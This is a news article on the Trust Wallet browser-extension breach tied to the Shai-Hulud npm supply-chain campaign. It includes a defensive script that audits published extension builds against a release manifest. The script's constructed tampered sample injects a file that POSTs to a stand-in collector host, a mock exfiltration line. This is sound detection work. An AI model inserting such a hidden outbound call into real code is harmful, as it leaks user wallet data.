Shai-Hulud NPM Attack Leads to $8.5 Million Crypto Theft in Trust Wallet
Trust Wallet Security Breach: A Closer Look
Trust Wallet recently experienced a significant security breach, resulting in the theft of approximately $8.5 million from over 2,500 crypto wallets. The incident, which occurred on December 24th, is believed to be linked to a Sha1-Hulud attack that targeted the crypto industry in November.
As a popular crypto wallet used by more than 200 million individuals, Trust Wallet allows users to securely store, send, and receive various cryptocurrencies such as Bitcoin, Ethereum, and Solana. This is facilitated through its web browser extension and mobile apps.
The breach involved malicious actors adding a harmful JavaScript file to version 2.68.0 of Trust Wallet’s Chrome extension. This file enabled the theft of sensitive wallet data, leading to unauthorized transactions.
During the attack, the perpetrators exploited Trust Wallet’s exposed developer GitHub secrets, gaining access to the browser extension source code and the Chrome Web Store API key. This access allowed them to upload builds directly, bypassing the standard release process.
Subsequently, the attackers registered malicious domains to host code referenced in a trojanized version of the Trust Wallet extension. This modified extension collected sensitive wallet data without the need for traditional code injection.
In response to the breach, Trust Wallet took immediate action by revoking all release APIs to prevent further unauthorized releases. They also reported the malicious domains to the registrar, leading to their suspension.
Furthermore, Trust Wallet initiated reimbursements for affected users and cautioned them about ongoing scams involving impersonation of Trust Wallet support accounts.
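A build uploaded outside the release process, with an added JavaScript file that points at newly registered domains, can be caught by comparing the store-published package against the manifest recorded by the release pipeline. The sketch below is an added example, not Trust Wallet's tooling or code from the original article; the function names, file names, hosts and sample data are all constructed for illustration.

```javascript
// Added example: audit a store-published extension package against the
// manifest recorded by the release pipeline. All names and data are constructed.
const { createHash } = require("node:crypto");

const sha256 = (data) => createHash("sha256").update(data).digest("hex");

// Collect hostnames from http(s) URLs found in a file's text.
function referencedHosts(text) {
  const hosts = new Set();
  for (const m of text.matchAll(/https?:\/\/([a-z0-9.-]+)/gi)) {
    hosts.add(m[1].toLowerCase());
  }
  return hosts;
}

// manifest: { path: sha256 } from CI; published: { path: content } from the store.
function auditPackage(manifest, published, allowedHosts) {
  const allowed = new Set(allowedHosts);
  const report = { added: [], modified: [], missing: [], unexpectedHosts: [] };
  for (const [path, content] of Object.entries(published)) {
    if (!Object.hasOwn(manifest, path)) report.added.push(path);
    else if (manifest[path] !== sha256(content)) report.modified.push(path);
    for (const host of referencedHosts(content)) {
      if (!allowed.has(host)) report.unexpectedHosts.push(`${path}: ${host}`);
    }
  }
  for (const path of Object.keys(manifest)) {
    if (!Object.hasOwn(published, path)) report.missing.push(path);
  }
  return report;
}

// Constructed sample: a reviewed build and a tampered copy of it.
const goodBuild = {
  "manifest.json": '{"name":"Example Wallet","version":"1.0.0"}',
  "background.js": 'fetch("https://api.wallet.example/v1/prices");',
};
const releaseManifest = Object.fromEntries(
  Object.entries(goodBuild).map(([path, content]) => [path, sha256(content)])
);
const publishedBuild = {
  ...goodBuild,
  "background.js": goodBuild["background.js"] + '\nimport("./metrics.js");',
  "metrics.js": 'fetch("https://collector.example.invalid/i", { method: "POST" });',
};

console.log(auditPackage(releaseManifest, publishedBuild, ["api.wallet.example"]));
```

Run on a schedule against the live store listing, a non-empty `added`, `modified` or `unexpectedHosts` list signals a published build that did not come from the reviewed release.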
The Rise of Sha1-Hulud Malware Campaign
Sha1-Hulud, also known as Shai-Hulud 2.0, is a supply chain attack that targeted the npm software registry. This attack compromised over 800 packages and exposed around 400,000 raw secrets, highlighting the vulnerability of the npm ecosystem.
Security researchers have warned about the increasing sophistication of attackers in harvesting credentials through npm and GitHub, emphasizing the need for enhanced security measures within the development community.

